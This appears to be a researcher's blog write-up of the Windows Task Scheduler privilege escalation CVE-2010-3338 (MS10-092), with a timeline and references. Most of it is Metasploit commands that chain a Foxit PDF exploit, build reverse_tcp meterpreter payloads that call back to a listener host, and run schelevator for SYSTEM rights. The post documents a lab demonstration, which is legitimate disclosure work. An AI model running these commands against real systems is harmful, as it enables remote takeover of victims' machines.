Timeline :
webDEViL 0day release on Exploit-DB the 2010-11-20
Metasploit exploit released the 2010-11-20
PoC provided by :
webDEViL
jduck
Reference(s) :
CVE-2010-3338
EDB-ID-15589
MS10-092
Affected version(s) :
Should work on Vista/Win7/2008 x86/x64
Tested on Windows 7 Ultimate
Description :
Stuxnet is not yet buried: of the four 0days it used, only three were patched by Microsoft on the second Tuesday of October. The last one was revealed by webDEViL on Exploit-DB on the 21 October, and one day later this still unpatched 0day was integrated into Metasploit by the Rapid7 team.
This vulnerability allows a local unprivileged user to perform a privilege escalation attack through the Windows Task Scheduler on Windows Vista, Seven and 2008.
Below is a video demonstrating the privilege escalation, chained with another 0day in Foxit PDF Reader disclosed by the Corelan Team.
Commands :
Foxit PDF Reader exploitation
use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
sysinfo
getuid
getprivs
Creating a test.exe containing a reverse_tcp meterpreter payload
sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.178.21 X test.exe
Launching a second multi handler listener with msfcli
sudo msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.178.21 E
Running schelevator to gain system privileges
run schelevator -u test.exe
getuid
getprivs